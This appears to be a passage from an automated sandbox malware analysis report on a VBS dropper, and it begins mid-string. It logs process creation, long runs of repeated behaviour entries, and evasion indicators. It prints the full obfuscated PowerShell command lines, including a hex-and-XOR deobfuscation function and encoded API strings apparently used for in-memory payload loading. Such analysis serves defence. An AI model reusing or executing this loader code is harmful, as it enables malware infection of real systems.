No'UdEAn8KoCRuCUnCdo6TrDWo7cuCcuAFaDha6LyCDiAUnCNe3KrDCa1ma8FlBImFDi2DdCDyCSaCGrBSe9Am6Ch9Ok7Re8grBskFhu0ReCFiBMoDDi6NaCCo4SkCUn3HiCBr0KeETrBPoCSh4GrDRe1AnCBoCYnDSo3MiCAf0SaEUn8SaCTo0TiDCo1ScCZoDNoCFlAMeCut1KoDSe6Bo'Sq;Gr`$FiFDooStrnosKokIdnCoiblnSkgJosSprDaeTssTeuUnlSttSvaPrtHoeChrHysDi2Ny=PoSUmmPeeKnrqutCleHonidsFobFoaPrrUnnKosPo0Ra Ve'TrEPa2ImCRe0spDpr1VaFCa5TeDPa7lyCBrAHeCSi6DiEIr4VaCFr1DaCVa1UpDDu7TeCGy0hoDRe6UdDSu6De'Me;Ud`$GrFTeolerLusCukClnRaiSanHagcisCyrBeeDesVauSylFotSkaAntmueSarUdsEt3La=RaSStmEkeSkrSatHueSunTrsInbBeaHerRonFosKu0He Co'FrFRe6slDMeCFoDin6BeDOp1ToCBu0CoCUl8Gu8MeBUnFCo7OpDMo0MaCWeBJaDVi1plCJoCArCSh8BaCSt0nu8CoBMeEReCDiCFeBTaDLy1soCOm0EuDAf7ReCSuAtoDDh5brFVa6PsCIn0FeDDi7maDBa3KaCChCReCMe6FlCde0UiDHu6Re8ReBGeEseDBaCSp4KlCStBryCca1SkCfr9DaCke0EsFMi7UnCdu0PrCAs3hf'Gr;De`$PoFChoMirPesDikFlnIniBanovgSasMarKaeGrsBeuValFotFraTrtHieAlrStsKl4Da=FoSnomfjegorSvtGreBunKasLgbSparorUnnSosIn0Al Gr'JoDAd6enDSe1PeDch7DiCPrCAmCSyBFrCPi2Mu'Ra;We`$IrFBroLurSusCoktonFeiAnnNogTasMirpieLiscauTalExtKaaSptDoeunrSisIr5Do=OcSMimBaeStrRetLteSonFusUdbGraMurFonMosDr0M
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Vildmnd = """SaFLauConFacGatUniStoUnnLi suSSemLeeAurGltIneFrnAnsFrbAnaCarIrnPrsre0St To{Ch Ir Al Ud DopCoaSerUsaPemAn(Th[FoSRetHorKoiBonSagSu]In`$NoRAfenoguniHyoOpnMesHapFrlInathnStlVaoIsvUnsel)Bo;Hu In Po Fe Fo`$DiDOceWilMuiUnnPhtBaeHerJuvSyaNalPrlGaeTorKonIfeCosDi No=Br WhNBeetrwKo-FjOKobThjRaeLecCotUn BebStyEntCieKo[cu]Hu Cr(Hy`$mrRDreOagviiMyoBanTvsKvpEklOvaacnFrlSloHovsosPi.SuLAbeNenWagSmtHuhTh No/Be Ze2Co)St;Pe Sk Gt Mi SuFUdomerOm(cr`$ArKUblVaiOvsSetUnrEmiAznTeggeeUnrGu=Al0re;Un Tr`$SpKTjlDriMesAktSurFoiUnnCagMeeSarIc He-FalBrtKa Ac`$TiRWieUdgUdiDeoRanObsSkpRelMiaPrnAnlreoAlvInsfo.BoLTreFanPrgFrtSthDd;Uu Sp`$SyKFolGoiAlsExtinrTriLinUngSkeIcrRe+Fl=Zi2he)Le{Ga Ys Un Pa Pr Te Ta Il Af`$TrDBreNolFoiSenFotCaeBrrduvPeaArlMulIneTrrFonSheHysSa[Re`$ReKOmlPaiDasTrtBurOritenVegDoeDirOp/Sw2Be]Em Gk=Lo Co[PocOnoSunTivUneMarKrtTa]Vi:tr:WiTReoRoBVgyEttWaeDe(Ma`$GrRWheFogTuiAnoNonBysDipLolDeaFonPrlUdoFovGrsUn.PaSFoucobDusBrtForCliMenTugli(Ja`$CeKMelIciAysAftMirGriCinUvgUneStrSe,Fu te2Ho)Ko,Sk Ba1Ti6Va)Fl;Ga Va Ar`$UnDSceKelPiirenFltpeeDorTevStaColFjlTrePerAcnOveDisLa[Ca`$AfKtalIdiKlsCotskrHyiUnnBrgsueAsrte/Mo2Pe]Le Zo=Mi Ne(ne`$PiDsleaulSuiFanmytFjeAnrFevTeaPrlnolKreLurFrnByeThsOb[Ek`$BaKUdltriOrsLatserOsiChnJegSkeThrSp/Er2Mu]Bi Be-prbmeximoForGr Es1Sk6St5Fr)De;Ar kn Gi An Ma}He Vn[ReSGatakrHaiSinLogOx]fi[TaSmoyCosHatPaeChmOr.unTAleAbxOvtFo.ExEkvnNocAaoMedStiHonAsgBo]No:Bi:TiADiSBeCGrILaIHu.raGCoeVitKoSVatprrUniLanSugHa(Ec`$MaDExeKvlFaiFlnBatEnePorssvFuaJalInlIneGorExnBieWhsAn)Eq;Pa}St`$RiFUpoKorsksInkMinVeiFanDugMesrerLieBrsOvuRelHotIdaUrtDieKtrDesfa0In=SiSHimUfecergotafePrnknsvibHeaHyrEknmissi0Fi Dr'MeFSv6AfDSnCfaDSu6SuDVe1InCHj0AfCUn8Da8UdBBvCMa1BaCre9VaCOr9Sa'Un;Al`$LiFodoKerHosLikConHuiTrnSpgDoslarSueEjsTeuTelVetBiaGrtReeOvransLe1Wa=OuSLumMoeUrrBrtUmeKanHyspobMuaWirInnAnsNo0Br No'UdEAn8KoCRuCUnCdo6TrDWo7cuCcuAFaDha6LyCDiAUnCNe3KrDCa1ma8FlBImFDi2DdCDyCSaCGrBSe9Am6Ch9Ok7Re8grBskFhu0ReCFiBMoDDi6NaCCo4SkCUn3HiCBr0KeETrBPoCSh4GrDRe1AnCBoCYnDSo3MiCAf0SaEUn8SaCTo0TiDCo1ScCZoDNoCFlAMeCut1KoDSe6Bo'Sq;Gr`$FiFDooStrnosKokIdnCoiblnSkgJosSprDaeTssTeuUnlSttSvaPrtHoeChrHysDi2Ny=PoSUmmPeeKnrqutCleHonidsFobFoaPrrUnnKosPo0Ra Ve'TrEPa2ImCRe0spDpr1VaFCa5TeDPa7lyCBrAHeCSi6DiEIr4VaCFr1DaCVa1UpDDu7TeCGy0hoDRe6UdDSu6De'Me;Ud`$GrFTeolerLusCukClnRaiSanHagcisCyrBeeDesVauSylFotSkaAntmueSarUdsEt3La=RaSStmEkeSkrSatHueSunTrsInbBeaHerRonFosKu0He Co'FrFRe6slDMeCFoDin6BeDOp1ToCBu0CoCUl8Gu8MeBUnFCo7OpDMo0MaCWeBJaDVi1plCJoCArCSh8BaCSt0nu8CoBMeEReCDiCFeBTaDLy1soCOm0EuDAf7ReCSuAtoDDh5brFVa6PsCIn0FeDDi7maDBa3KaCChCReCMe6FlCde0UiDHu6Re8ReBGeEseDBaCSp4KlCStBryCca1SkCfr9DaCke0EsFMi7UnCdu0PrCAs3hf'Gr;De`$PoFChoMirPesDikFlnIniBanovgSasMarKaeGrsBeuValFotFraTrtHieAlrStsKl4Da=FoSnomfjegorSvtGreBunKasLgbSparorUnnSosIn0Al Gr'JoDAd6enDSe1PeDch7DiCPrCAmCSyBFrCPi2Mu'Ra;We`$IrFBroLurSusCoktonFeiAnnNogTasMirpieLiscauTalExtKaaSptDoeunrSisIr5Do=OcSMimBaeStrRetLteSonFusUdbGraMurFonMosDr0MJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Potential evasive VBS script found (use of timer() function in loop)
Source: Initial fileInitial file: do while timer-temp<sec
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3608Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFDC3F811AB sldt word ptr [eax-023BE512h]10_2_00007FFDC3F811AB
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$vildmnd = """saflauconfacgatunistounnli sussemleeaurgltinefrnansfrbanacarirnprsre0st to{ch ir al ud dopcoaserusapeman(th[fosrethorkoibonsagsu]in`$norafenogunihyoopnmeshapfrlinathnstlvaoisvunsel)bo;hu in po fe fo`$didocewilmuiunnphtbaeherjuvsyanalprlgaetorkonifecosdi no=br whnbeetrwko-fjokobthjraeleccotun bebstyentcieko[cu]hu cr(hy`$mrrdreoagviimyobantvskvpeklovaacnfrlslohovsospi.sulabenenwagsmthuhth no/be ze2co)st;pe sk gt mi sufudomerom(cr`$arkublvaiovssetunremiaznteggeeunrgu=al0re;un tr`$spktjldrimesaktsurfoiunncagmeesaric he-falbrtka ac`$tirwieudgudideoranobsskprelmiaprnanlreoalvinsfo.boltrefanprgfrtsthdd;uu sp`$sykfolgoialsextinrtrilinungskeicrre+fl=zi2he)le{ga ys un pa pr te ta il af`$trdbrenolfoisenfotcaebrrduvpeaarlmulinetrrfonshehyssa[re`$rekomlpaidastrtburoritenvegdoedirop/sw2be]em gk=lo co[poconosuntivunemarkrtta]vi:tr:witreorobvgyettwaede(ma`$grrwhefogtuianononbysdiploldeafonprludofovgrsun.pasfoucobdusbrtforclimentugli(ja`$cekmeliciaysaftmirgricinuvgunestrse,fu te2ho)ko,sk ba1ti6va)fl;ga va ar`$undscekelpiirenfltpeedortevstacolfjltreperacnovedisla[ca`$afktalidiklscotskrhyiunnbrgsueasrte/mo2pe]le zo=mi ne(ne`$pidsleaulsuifanmytfjeanrfevteaprlnolkrelurfrnbyethsob[ek`$bakudltriorslatserosichnjegskethrsp/er2mu]bi be-prbmeximoforgr es1sk6st5fr)de;ar kn gi an ma}he vn[resgatakrhaisinlogox]fi[tasmoycoshatpaechmor.untaleabxovtfo.exekvnnocaaomedstihonasgbo]no:bi:tiadisbecgrilaihu.ragcoevitkosvatprrunilansugha(ec`$madexekvlfaiflnbateneporssvfuajalinlinegorexnbiewhsan)eq;pa}st`$rifupokorsksinkminveifandugmesrerliebrsovurelhotidaurtdiektrdesfa0in=sishimufecergotafeprnknsvibheahyreknmissi0fi dr'mefsv6afdsncfadsu6sudve1inchj0afcun8da8udbbvcma1bacre9vacor9sa'un;al`$lifodokerhoslikconhuitrnspgdoslarsueejsteutelvetbiagrtreeovransle1wa=ouslummoeurrbrtumekanhyspobmuawirinnansno0br no'udean8kocrucuncdo6trdwo7cuccuafadha6lycdiauncne3krdca1ma8flbimfdi2ddcdycsacgrbse9am6ch9ok7re8grbskfhu0recfibmoddi6nacco4skcun3hicbr0keetrbpocsh4grdre1ancbocyndso3micaf0saeun8sacto0tidco1scczodnocflamecut1kodse6bo'sq;gr`$fifdoostrnoskokidncoiblnskgjossprdaetssteuunlsttsvaprthoechrhysdi2ny=posummpeeknrqutclehonidsfobfoaprrunnkospo0ra ve'trepa2imcre0spdpr1vafca5tedpa7lycbrahecsi6dieir4vacfr1dacva1upddu7tecgy0hodre6uddsu6de'me;ud`$grfteolerluscukclnraisanhagciscyrbeedesvausylfotskaantmuesarudset3la=rasstmekeskrsathuesuntrsinbbeaherronfosku0he co'frfre6sldmecfodin6bedop1tocbu0cocul8gu8mebunfco7opdmo0macwebjadvi1plcjocarcsh8bacst0nu8cobmeerecdicfebtadly1socom0eudaf7recsuatoddh5brfva6pscin0feddi7madba3kacchcrecme6flcde0uidhu6re8rebgeesedbacsp4klcstbrycca1skcfr9dacke0esfmi7uncdu0prcas3hf'gr;de`$pofchomirpesdikflninibanovgsasmarkaegrsbeuvalfotfratrthiealrstskl4da=fosnomfjegorsvtgrebunkaslgbsparorunnsosin0al gr'jodad6endse1pedch7dicprcamcsybfrcpi2mu'ra;we`$irfbrolursuscoktonfeiannnogtasmirpieliscautalextkaasptdoeunrsisir5do=ocsmimbaestrretltesonfusudbgramurfonmosdr0m
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "function smertensbarns0 { param([string]$regionsplanlovs); $delintervallernes = new-object byte[] ($regionsplanlovs.length / 2); for($klistringer=0; $klistringer -lt $regionsplanlovs.length; $klistringer+=2){ $delintervallernes[$klistringer/2] = [convert]::tobyte($regionsplanlovs.substring($klistringer, 2), 16); $delintervallernes[$klistringer/2] = ($delintervallernes[$klistringer/2] -bxor 165); } [string][system.text.encoding]::ascii.getstring($delintervallernes);}$forskningsresultaters0=smertensbarns0 'f6dcd6d1c0c88bc1c9c9';$forskningsresultaters1=smertensbarns0 'e8ccc6d7cad6cac3d18bf2cccb96978bf0cbd6c4c3c0ebc4d1ccd3c0e8c0d1cdcac1d6';$forskningsresultaters2=smertensbarns0 'e2c0d1f5d7cac6e4c1c1d7c0d6d6';$forskningsresultaters3=smertensbarns0 'f6dcd6d1c0c88bf7d0cbd1ccc8c08beccbd1c0d7cad5f6c0d7d3ccc6c0d68bedc4cbc1c9c0f7c0c3';$forskningsresultaters4=smertensbarns0 'd6d1d7cccbc2';$forskningsresultaters5=smertensbarns0 'e2c0d1e8cac1d0c9c0edc4cbc1c9c0';$forskningsresultaters6=smertensbarns0 'f7f1f6d5c0c6ccc4c9ebc4c8c08985edccc1c0e7dcf6ccc28985f5d0c7c9ccc6';$forskningsresultaters7=smertensbarns0 'f7d0cbd1ccc8c08985e8c4cbc4c2c0c1';$forskningsresultaters8=smertensbarns0 'f7c0c3c9c0c6d1c0c1e1c0c9c0c2c4d1c0';$forskningsresultaters9=smertensbarns0 'eccbe8c0c8cad7dce8cac1d0c9c0';$ghegish0=smertensbarns0 'e8dce1c0c9c0c2c4d1c0f1dcd5c0';$ghegish1=smertensbarns0 'e6c9c4d6d68985f5d0c7c9ccc68985f6c0c4c9c0c18985e4cbd6cce6c9c4d6d68985e4d0d1cae6c9c4d6d6';$ghegish2=smertensbarns0 'eccbd3cacec0';$ghegish3=smertensbarns0 'f5d0c7c9ccc68985edccc1c0e7dcf6ccc28985ebc0d2f6c9cad18985f3ccd7d1d0c4c9';$ghegish4=smertensbarns0 'f3ccd7d1d0c4c9e4c9c9cac6';$ghegish5=smertensbarns0 'cbd1c1c9c9';$ghegish6=smertensbarns0 'ebd1f5d7cad1c0c6d1f3ccd7d1d0c4c9e8c0c8cad7dc';$ghegish7=smertensbarns0 'ece0fd';$ghegish8=smertensbarns0 'f9';function fkp {param ($upgrown, $depressionsperioder) ;$hoeres0 =smertensbarns0 '81eed7c8c8c0d7c0cb8598858dfee4d5d5e1cac8c4cccbf89f9fe6d0d7d7c0cbd1e1cac8c4cccb8be2c0d1e4d6d6c0c8c7c9ccc0d68d8c85d985f2cdc0d7c088eac7cfc0c6d185de8581fa8be2c9cac7c4c9e4d6d6c0c8c7c9dce6c4c6cdc08588e4cbc18581fa8be9cac6c4d1cccacb8bf6d5c9ccd18d81e2cdc0c2ccd6cd9d8cfe8894f88be0d4d0c4c9d68d81e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d6958c85d88c8be2c0d1f1dcd5c08d81e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d6948c';&($ghegish7) $hoeres0;$hoeres5 = smertensbarns0 '81e6cdccc9c985988581eed7c8c8c0d7c0cb8be2c0d1e8c0d1cdcac18d81e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d6978985fef1dcd5c0fef8f885e58d81e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d696898581e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d6918c8c';&($ghegish7) $hoeres5;$hoeres1 = smertensbarns0 'd7c0d1d0d7cb8581e6cdccc9c98beccbd3cacec08d81cbd0c9c98985e58dfef6dcd6d1c0c88bf7d0cbd1ccc8c08beccbd1c0d7cad5f6c0d7d3ccc6c0d68bedc4cbc1c9c0f7c0c3f88debc0d288eac7cfc0c6d185f6dcd6d1c0c88bf7d0cbd1ccc8c08beccbd1c0d7cad5f6c0d7d3cc
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$vildmnd = """saflauconfacgatunistounnli sussemleeaurgltinefrnansfrbanacarirnprsre0st to{ch ir al ud dopcoaserusapeman(th[fosrethorkoibonsagsu]in`$norafenogunihyoopnmeshapfrlinathnstlvaoisvunsel)bo;hu in po fe fo`$didocewilmuiunnphtbaeherjuvsyanalprlgaetorkonifecosdi no=br whnbeetrwko-fjokobthjraeleccotun bebstyentcieko[cu]hu cr(hy`$mrrdreoagviimyobantvskvpeklovaacnfrlslohovsospi.sulabenenwagsmthuhth no/be ze2co)st;pe sk gt mi sufudomerom(cr`$arkublvaiovssetunremiaznteggeeunrgu=al0re;un tr`$spktjldrimesaktsurfoiunncagmeesaric he-falbrtka ac`$tirwieudgudideoranobsskprelmiaprnanlreoalvinsfo.boltrefanprgfrtsthdd;uu sp`$sykfolgoialsextinrtrilinungskeicrre+fl=zi2he)le{ga ys un pa pr te ta il af`$trdbrenolfoisenfotcaebrrduvpeaarlmulinetrrfonshehyssa[re`$rekomlpaidastrtburoritenvegdoedirop/sw2be]em gk=lo co[poconosuntivunemarkrtta]vi:tr:witreorobvgyettwaede(ma`$grrwhefogtuianononbysdiploldeafonprludofovgrsun.pasfoucobdusbrtforclimentugli(ja`$cekmeliciaysaftmirgricinuvgunestrse,fu te2ho)ko,sk ba1ti6va)fl;ga va ar`$undscekelpiirenfltpeedortevstacolfjltreperacnovedisla[ca`$afktalidiklscotskrhyiunnbrgsueasrte/mo2pe]le zo=mi ne(ne`$pidsleaulsuifanmytfjeanrfevteaprlnolkrelurfrnbyethsob[ek`$bakudltriorslatserosichnjegskethrsp/er2mu]bi be-prbmeximoforgr es1sk6st5fr)de;ar kn gi an ma}he vn[resgatakrhaisinlogox]fi[tasmoycoshatpaechmor.untaleabxovtfo.exekvnnocaaomedstihonasgbo]no:bi:tiadisbecgrilaihu.ragcoevitkosvatprrunilansugha(ec`$madexekvlfaiflnbateneporssvfuajalinlinegorexnbiewhsan)eq;pa}st`$rifupokorsksinkminveifandugmesrerliebrsovurelhotidaurtdiektrdesfa0in=sishimufecergotafeprnknsvibheahyreknmissi0fi dr'mefsv6afdsncfadsu6sudve1inchj0afcun8da8udbbvcma1bacre9vacor9sa'un;al`$lifodokerhoslikconhuitrnspgdoslarsueejsteutelvetbiagrtreeovransle1wa=ouslummoeurrbrtumekanhyspobmuawirinnansno0br no'udean8kocrucuncdo6trdwo7cuccuafadha6lycdiauncne3krdca1ma8flbimfdi2ddcdycsacgrbse9am6ch9ok7re8grbskfhu0recfibmoddi6nacco4skcun3hicbr0keetrbpocsh4grdre1ancbocyndso3micaf0saeun8sacto0tidco1scczodnocflamecut1kodse6bo'sq;gr`$fifdoostrnoskokidncoiblnskgjossprdaetssteuunlsttsvaprthoechrhysdi2ny=posummpeeknrqutclehonidsfobfoaprrunnkospo0ra ve'trepa2imcre0spdpr1vafca5tedpa7lycbrahecsi6dieir4vacfr1dacva1upddu7tecgy0hodre6uddsu6de'me;ud`$grfteolerluscukclnraisanhagciscyrbeedesvausylfotskaantmuesarudset3la=rasstmekeskrsathuesuntrsinbbeaherronfosku0he co'frfre6sldmecfodin6bedop1tocbu0cocul8gu8mebunfco7opdmo0macwebjadvi1plcjocarcsh8bacst0nu8cobmeerecdicfebtadly1socom0eudaf7recsuatoddh5brfva6pscin0feddi7madba3kacchcrecme6flcde0uidhu6re8rebgeesedbacsp4klcstbrycca1skcfr9dacke0esfmi7uncdu0prcas3hf'gr;de`$pofchomirpesdikflninibanovgsasmarkaegrsbeuvalfotfratrthiealrstskl4da=fosnomfjegorsvtgrebunkaslgbsparorunnsosin0al gr'jodad6endse1pedch7dicprcamcsybfrcpi2mu'ra;we`$irfbrolursuscoktonfeiannnogtasmirpieliscautalextkaasptdoeunrsisir5do=ocsmimbaestrretltesonfusudbgramurfonmosdr0mJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "function smertensbarns0 { param([string]$regionsplanlovs); $delintervallernes = new-object byte[] ($regionsplanlovs.length / 2); for($klistringer=0; $klistringer -lt $regionsplanlovs.length; $klistringer+=2){ $delintervallernes[$klistringer/2] = [convert]::tobyte($regionsplanlovs.substring($klistringer, 2), 16); $delintervallernes[$klistringer/2] = ($delintervallernes[$klistringer/2] -bxor 165); } [string][system.text.encoding]::ascii.getstring($delintervallernes);}$forskningsresultaters0=smertensbarns0 'f6dcd6d1c0c88bc1c9c9';$forskningsresultaters1=smertensbarns0 'e8ccc6d7cad6cac3d18bf2cccb96978bf0cbd6c4c3c0ebc4d1ccd3c0e8c0d1cdcac1d6';$forskningsresultaters2=smertensbarns0 'e2c0d1f5d7cac6e4c1c1d7c0d6d6';$forskningsresultaters3=smertensbarns0 'f6dcd6d1c0c88bf7d0cbd1ccc8c08beccbd1c0d7cad5f6c0d7d3ccc6c0d68bedc4cbc1c9c0f7c0c3';$forskningsresultaters4=smertensbarns0 'd6d1d7cccbc2';$forskningsresultaters5=smertensbarns0 'e2c0d1e8cac1d0c9c0edc4cbc1c9c0';$forskningsresultaters6=smertensbarns0 'f7f1f6d5c0c6ccc4c9ebc4c8c08985edccc1c0e7dcf6ccc28985f5d0c7c9ccc6';$forskningsresultaters7=smertensbarns0 'f7d0cbd1ccc8c08985e8c4cbc4c2c0c1';$forskningsresultaters8=smertensbarns0 'f7c0c3c9c0c6d1c0c1e1c0c9c0c2c4d1c0';$forskningsresultaters9=smertensbarns0 'eccbe8c0c8cad7dce8cac1d0c9c0';$ghegish0=smertensbarns0 'e8dce1c0c9c0c2c4d1c0f1dcd5c0';$ghegish1=smertensbarns0 'e6c9c4d6d68985f5d0c7c9ccc68985f6c0c4c9c0c18985e4cbd6cce6c9c4d6d68985e4d0d1cae6c9c4d6d6';$ghegish2=smertensbarns0 'eccbd3cacec0';$ghegish3=smertensbarns0 'f5d0c7c9ccc68985edccc1c0e7dcf6ccc28985ebc0d2f6c9cad18985f3ccd7d1d0c4c9';$ghegish4=smertensbarns0 'f3ccd7d1d0c4c9e4c9c9cac6';$ghegish5=smertensbarns0 'cbd1c1c9c9';$ghegish6=smertensbarns0 'ebd1f5d7cad1c0c6d1f3ccd7d1d0c4c9e8c0c8cad7dc';$ghegish7=smertensbarns0 'ece0fd';$ghegish8=smertensbarns0 'f9';function fkp {param ($upgrown, $depressionsperioder) ;$hoeres0 =smertensbarns0 